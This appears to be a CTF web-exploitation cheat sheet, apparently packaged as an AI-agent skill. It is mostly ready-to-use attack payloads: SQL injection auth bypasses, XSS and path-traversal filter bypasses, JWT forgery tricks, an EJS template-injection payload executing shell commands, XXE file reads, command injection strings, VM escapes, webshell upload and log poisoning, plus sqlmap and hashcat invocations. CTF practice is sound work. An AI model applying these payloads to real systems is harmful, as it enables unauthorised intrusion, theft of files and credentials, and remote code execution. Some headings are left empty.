CTF Web Exploitation

Quick reference for web CTF challenges. Each technique has a one-liner here; see supporting files for full details with payloads and code.

Additional Resources

server-side.md - Server-side attacks: SQLi, SSTI, SSRF, XXE, command injection, code injection (Ruby/Perl/Python), ReDoS, file write→RCE, eval bypass
client-side.md - Client-side attacks: XSS, CSRF, CSPT, cache poisoning, DOM tricks, React input filling, hidden elements
auth-and-access.md - Auth/authz attacks: JWT, session, password inference, weak validation, client-side gates, NoSQL auth bypass
node-and-prototype.md - Node.js: prototype pollution, VM sandbox escape, Happy-DOM chain, flatnest CVE
web3.md - Blockchain/Web3: Solidity exploits, proxy patterns, ABI encoding tricks, Foundry tooling
cves.md - CVE-specific exploits: Next.js middleware bypass, curl credential leak, Uvicorn CRLF, urllib scheme bypass

Reconnaissance

View source for HTML comments, check JS/CSS files for internal APIs
Look for .map source map files
Check response headers for custom X- headers and auth hints
Common paths: /robots.txt , /sitemap.xml , /.well-known/ , /admin , /api , /debug , /.git/ , /.env
Search JS bundles: grep -oE '"/api/[^"]+"' for hidden endpoints
Check for client-side validation that can be bypassed
Compare what the UI sends vs. what the API accepts (read JS bundle for all fields)

SQL Injection Quick Reference

Detection: Send ' — syntax error indicates SQLi

' OR '1'='1 # Classic auth bypass ' OR 1=1-- # Comment termination username=&password= OR 1=1-- # Backslash escape quote bypass ' UNION SELECT sql,2,3 FROM sqlite_master-- # SQLite schema 0x6d656f77 # Hex encoding for 'meow' (bypass quotes)

See server-side.md for second-order SQLi, LIKE brute-force, SQLi→SSTI chains.

XSS Quick Reference

Filter bypass: hex \x3cscript\x3e , entities <script> , case mixing <ScRiPt> , event handlers.

See client-side.md for DOMPurify bypass, cache poisoning, CSPT, React input tricks.

Path Traversal / LFI Quick Reference

../../../etc/passwd ....//....//....//etc/passwd # Filter bypass ..%2f..%2f..%2fetc/passwd # URL encoding %252e%252e%252f # Double URL encoding {.}{.}/flag.txt # Brace stripping bypass

Python footgun: os.path.join('/app/public', '/etc/passwd') returns /etc/passwd

JWT Quick Reference

alg: none — remove signature entirely
Algorithm confusion (RS256→HS256) — sign with public key
Weak secret — brute force with hashcat/flask-unsign
Key exposure — check /api/getPublicKey , .env , /debug/config
Balance replay — save JWT, spend, replay old JWT, return items for profit

See auth-and-access.md for full JWT attacks and session manipulation.

SSTI Quick Reference

Detection: {{7*7}} returns 49

Jinja2 RCE

Go template

EJS

<%- global.process.mainModule.require('child_process').execSync('id') %>

SSRF Quick Reference

127.0.0.1, localhost, 127.1, 0.0.0.0, [::1] 127.0.0.1.nip.io, 2130706433, 0x7f000001

DNS rebinding for TOCTOU: https://lock.cmpxchg8b.com/rebinder.html

Command Injection Quick Reference

; id | id id $(id) %0aid # Newline 127.0.0.1%0acat /flag

When cat/head blocked: sed -n p flag.txt , awk '{print}' , tac flag.txt

XXE Quick Reference

<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root>&xxe;</root>

PHP filter: <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">

Code Injection Quick Reference

Ruby instance_eval : Break string + comment: VALID');INJECTED_CODE#

Perl open() : 2-arg open allows pipe: |command|

JS eval blocklist bypass: row['con'+'structor']['con'+'structor']('return this')()

PHP deserialization: Craft serialized object in cookie → LFI/RCE

See server-side.md for full payloads and bypass techniques.

Node.js Quick Reference

Prototype pollution: {"proto": {"isAdmin": true}} or flatnest circular ref bypass VM escape: this.constructor.constructor("return process")() → RCE Full chain: pollution → enable JS eval in Happy-DOM → VM escape → RCE

See node-and-prototype.md for detailed exploitation.

Auth & Access Control Quick Reference

Cookie manipulation: role=admin , isAdmin=true
Host header bypass: Host: 127.0.0.1
Hidden endpoints: search JS bundles for /api/internal/ , /api/admin/
Client-side gates: window.overrideAccess = true or call API directly
Password inference: profile data + structured ID format → brute-force
Weak signature: check if only first N chars of hash are validated

See auth-and-access.md for full patterns.

File Upload → RCE

.htaccess upload: AddType application/x-httpd-php .lol

webshell

Gogs symlink: overwrite .git/config with core.sshCommand RCE
Python .so hijack: write malicious shared object + delete .pyc to force reimport
ZipSlip: symlink in zip for file read, path traversal for file write
Log poisoning: PHP payload in User-Agent + path traversal to include log

See server-side.md for detailed steps.

Multi-Stage Chain Patterns

0xClinic chain: Password inference → path traversal + ReDoS oracle (leak secrets from /proc/1/environ ) → CRLF injection (CSP bypass + cache poisoning + XSS) → urllib scheme bypass (SSRF) → .so write via path traversal → RCE

Key chaining insights:

Path traversal + any file-reading primitive → leak /proc//environ , /proc//cmdline
CRLF in headers → CSP bypass + cache poisoning + XSS in one shot
Arbitrary file write in Python → .so hijacking or .pyc overwrite for RCE
Lowercased response body → use hex escapes (\x3c for < )

Useful Tools

sqlmap -u "http://target/?id=1" --dbs # SQLi ffuf -u http://target/FUZZ -w wordlist.txt # Directory fuzzing flask-unsign --decode --cookie "eyJ..." # JWT decode hashcat -m 16500 jwt.txt wordlist.txt # JWT crack dalfox url http://target/?q=test # XSS

Common Flag Locations

/flag.txt, /flag, /app/flag.txt, /home//flag Environment variables: /proc/self/environ Database: flag, flags, secret tables Response headers: x-flag, x-archive-tag, x-proof Hidden DOM: display:none elements, data attributes

ctf-web

Safety Notice

Copy this and send it to your AI assistant to learn

Jinja2 RCE

Go template

EJS

Source Transparency

Related Skills

ctf-osint

write-exploit

ctf-stego